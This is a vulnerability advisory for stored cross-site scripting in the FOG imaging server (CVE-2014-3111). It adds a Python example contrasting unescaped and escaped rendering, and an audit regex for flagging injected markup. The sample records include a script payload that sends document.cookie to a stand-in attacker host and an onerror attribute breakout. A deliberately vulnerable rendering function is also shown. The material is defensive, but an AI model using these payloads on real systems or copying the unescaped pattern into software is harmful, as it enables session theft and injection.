PT-2014-5097 · Fog · Fog

Published 2014-10-21 · Updated 2018-10-09 · CVE-2014-3111

CVSS v2.0: 3.5 (Low)
Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N
Name of the Vulnerable Software and Affected Versions: FOG versions 0.27 through 0.32
Description: Multiple cross-site scripting (XSS) vulnerabilities allow remote authenticated users to inject arbitrary web script or HTML via several fields: the Printer Model field on the "Printer Management" page, the Image Name field on the "Image Management" page, the Storage Group Name field on the "Storage Management" page, the Username field on the "User Cleanup FOG Configuration" page, and the Directory Path field on the "Directory Cleaner FOG Configuration" page. These are stored configuration values (printer, image, storage group and cleanup records), and the web console renders them back without HTML encoding each time the corresponding page is viewed, so markup planted by one authenticated user executes in the browser of any administrator who later opens that page. The CVSS vector reflects this: network-reachable (AV:N), a valid account is required (Au:S), and the impact is on the integrity of the victim's console session (I:P) rather than on the server directly.
Recommendations: At the time of writing there is no information about a newer version that contains a fix for this vulnerability. Until one is available, for FOG versions 0.27 through 0.32: restrict access to the Printer Management, Image Management, Storage Management, User Cleanup FOG Configuration and Directory Cleaner FOG Configuration pages to trusted administrators, since exploitation requires an authenticated user who can write those fields, and keep the web console off untrusted networks; audit the existing printer model, image name, storage group name, username and directory path values stored in the FOG database for HTML tags, inline event-handler attributes or javascript: URLs, and remove anything you find; and, if you maintain the PHP code locally, HTML-encode these fields at output time (htmlspecialchars with ENT_QUOTES) on the affected pages. Do not enter data from untrusted sources into the vulnerable fields until the issue is resolved.
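To make the mechanism and the triage step concrete, here is an added example in Python. It is not FOG's code: FOG is a PHP application and its real templates differ. The example reproduces the vulnerable pattern behind this issue (a stored field interpolated into the page without HTML encoding) next to the corrected form, and adds an audit function that flags stored values containing markup, for checking the five affected fields on an unpatched install. The sample records, the payloads and the attacker.invalid host are constructed for the example; the function and variable names are the example's own.

```python
import html
import re

# The (page, field) pairs named in the advisory for FOG 0.27 through 0.32.
AFFECTED_FIELDS = {
    "Printer Management": "Printer Model",
    "Image Management": "Image Name",
    "Storage Management": "Storage Group Name",
    "User Cleanup FOG Configuration": "Username",
    "Directory Cleaner FOG Configuration": "Directory Path",
}

# Constructed sample records standing in for rows pulled from the FOG
# database (not real data). Two of them carry payloads of the kind an
# authenticated user could save through the affected forms.
SAMPLE_RECORDS = [
    ("Printer Management", "Printer Model", "HP LaserJet 4250"),
    ("Printer Management", "Printer Model",
     "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"),
    ("Image Management", "Image Name",
     'Win7-base"><img src=x onerror=alert(document.domain)>'),
    ("Storage Management", "Storage Group Name", "default"),
    ("Directory Cleaner FOG Configuration", "Directory Path", "/images/dev"),
]


def render_row_unsafe(label, value):
    """Vulnerable pattern: the stored value is interpolated into the page
    verbatim, so any tag or attribute it contains becomes live markup."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(label, value)


def render_row_safe(label, value):
    """Fixed pattern: HTML-encode at output time, quotes included, so the value
    can neither close the surrounding element nor start a new tag or attribute.
    This is the Python equivalent of PHP's
    htmlspecialchars($value, ENT_QUOTES, 'UTF-8')."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(label, quote=True), html.escape(value, quote=True))


# Markers that have no business in a printer model, image name, storage
# group name, username or directory path. Deliberately broad: this is a
# triage filter for an unpatched server, and a false positive costs one
# manual look at a row.
_SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z]"      # a tag opener such as <script or </td
    r"|\bon[a-z]+\s*="     # an inline event handler such as onerror=
    r"|javascript\s*:"     # the javascript: URL scheme
    r"|[\"']\s*>",         # quote then '>': attribute breakout
    re.IGNORECASE,
)


def is_suspicious(value):
    """True if the stored value looks like injected HTML or script."""
    return _SUSPICIOUS.search(value) is not None


def audit(records):
    """Return every (page, field, value) record from an affected page whose
    value looks like injected markup. Run this over the real rows of an
    unpatched install before administrators keep using those pages."""
    return [r for r in records
            if AFFECTED_FIELDS.get(r[0]) == r[1] and is_suspicious(r[2])]


if __name__ == "__main__":
    page, field, payload = SAMPLE_RECORDS[1]
    print("unsafe:", render_row_unsafe(field, payload))
    print("safe:  ", render_row_safe(field, payload))
    for page, field, value in audit(SAMPLE_RECORDS):
        print("FLAGGED", page, "/", field, "=", repr(value))
```

Feed `audit` the real printer, image, storage-group and cleanup-configuration values exported from the FOG database and review every flagged row by hand; the filter errs on the side of flagging, which is the right trade-off for a handful of small tables. Encoding at output time, as in `render_row_safe`, is the durable fix: filtering on input alone leaves every already-stored payload live.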

Exploit: XSS


Weakness Enumeration: CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")

Related Identifiers: CVE-2014-3111

Affected Products: Fog